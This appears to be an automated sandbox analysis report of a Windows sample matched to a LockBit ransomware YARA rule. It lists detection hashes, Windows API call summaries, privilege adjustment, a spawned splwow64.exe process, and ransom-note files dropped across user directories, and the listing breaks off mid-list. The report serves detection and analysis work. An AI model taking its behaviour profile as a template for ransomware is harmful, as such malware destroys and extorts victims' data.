            Malicious sample detected (through community Yara rule)
            Source: file.exe, type: SAMPLEMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 0.3.file.exe.95ad4c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 0.0.file.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 0.2.file.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 00000000.00000000.248892998.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 00000000.00000003.283525117.000000000095A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 Author: unknown
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exe, type: SAMPLEMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 0.3.file.exe.95ad4c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 0.0.file.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 0.2.file.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 00000000.00000000.248892998.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 00000000.00000003.283525117.000000000095A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Lockbit_369e1e94 reference_sample = d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee, os = windows, severity = x86, creation_date = 2022-07-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Lockbit, fingerprint = 9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2, id = 369e1e94-3fbb-4828-bb78-89d26e008105, last_modified = 2022-07-18
            Source: C:\Windows\splwow64.exeFile created: C:\Windows\system32\spool\PRINTERS\00002.SPLJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D080880_2_00D08088
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D020BC0_2_00D020BC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D04D130_2_00D04D13
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D04D180_2_00D04D18
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D052280_2_00D05228
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D09850 NtClose,0_2_00D09850
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B5D0 NtQueryInformationToken,0_2_00D0B5D0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0DDD4 SetThreadPriority,ReadFile,WriteFile,WriteFile,NtClose,0_2_00D0DDD4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0C1E8 CreateFileW,WriteFile,NtClose,WriteFile,WriteFile,WriteFile,0_2_00D0C1E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0E144 CreateThread,NtClose,0_2_00D0E144
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B690 NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,0_2_00D0B690
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D06654 CreateFileW,NtAllocateVirtualMemory,WriteFile,SetFilePointerEx,NtFreeVirtualMemory,NtClose,DeleteFileW,0_2_00D06654
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A65C GetVolumeNameForVolumeMountPointW,FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl,NtClose,0_2_00D0A65C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07E28 NtQuerySystemInformation,Sleep,0_2_00D07E28
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B390 NtSetInformationThread,NtClose,0_2_00D0B390
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D16F90 CreateThread,CreateThread,CreateThread,CreateThread,NtTerminateThread,CreateThread,CreateThread,0_2_00D16F90
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0DBBC NtTerminateProcess,0_2_00D0DBBC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D097A8 NtQuerySystemInformation,0_2_00D097A8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0C354 CreateFileW,WriteFile,RegCreateKeyExW,RegSetValueExW,RegCreateKeyExW,RegSetValueExW,SHChangeNotify,NtClose,0_2_00D0C354
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D08F38 RtlAdjustPrivilege,NtSetInformationThread,0_2_00D08F38
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07E5A NtQuerySystemInformation,Sleep,0_2_00D07E5A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07E73 NtQuerySystemInformation,Sleep,0_2_00D07E73
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D097FA NtQuerySystemInformation,0_2_00D097FA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D097E1 NtQuerySystemInformation,0_2_00D097E1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D08F36 RtlAdjustPrivilege,NtSetInformationThread,0_2_00D08F36
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A65C: GetVolumeNameForVolumeMountPointW,FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl,NtClose,0_2_00D0A65C
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: SecurityJump to behavior
            Source: file.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: classification engineClassification label: mal100.rans.evad.winEXE@3/1155@0/0
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\AppData\Local\Temp\ArmUI.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Global\2ab75caad3590c05177ff8507e968bab
            Source: C:\Users\user\Desktop\file.exeFile written: C:\$Recycle.Bin\S-1-5-18\desktop.iniJump to behavior
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D035E3 push 0000006Ah; retf 0_2_00D03654
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D035E5 push 0000006Ah; retf 0_2_00D03654
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0619D pushfd ; iretd 0_2_00D0619E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0357B push 0000006Ah; retf 0_2_00D03654
            Source: file.exeStatic PE information: real checksum: 0x34291 should be: 0x32577
            Source: C:\Users\user\Desktop\file.exeFile created: C:\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Videos\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Searches\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Saved Games\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Recent\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\Camera Roll\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\OneDrive\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Music\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Links\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Favorites\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Favorites\Links\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Downloads\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\WSHEJMDVQC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\WDBWCPEFJW\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\VWDFPKGDUF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\OVWVVIANZH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\LHEPQPGEWF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\GNLQNHOLWB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\BXAJUJAOEO\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\BUFZSQPCOH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\AQRFEVRTGL\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\WSHEJMDVQC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\WDBWCPEFJW\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\VWDFPKGDUF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\OVWVVIANZH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\LHEPQPGEWF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\HMPPSXQPQV\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\GNLQNHOLWB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\BXAJUJAOEO\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\BUFZSQPCOH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Contacts\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Linguistics\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Headlights\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Linguistics\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\85f6be3a-85b2-4564-81df-36c7f7b33e36\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\assets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\VirtualStore\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\PeerDistRepub\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
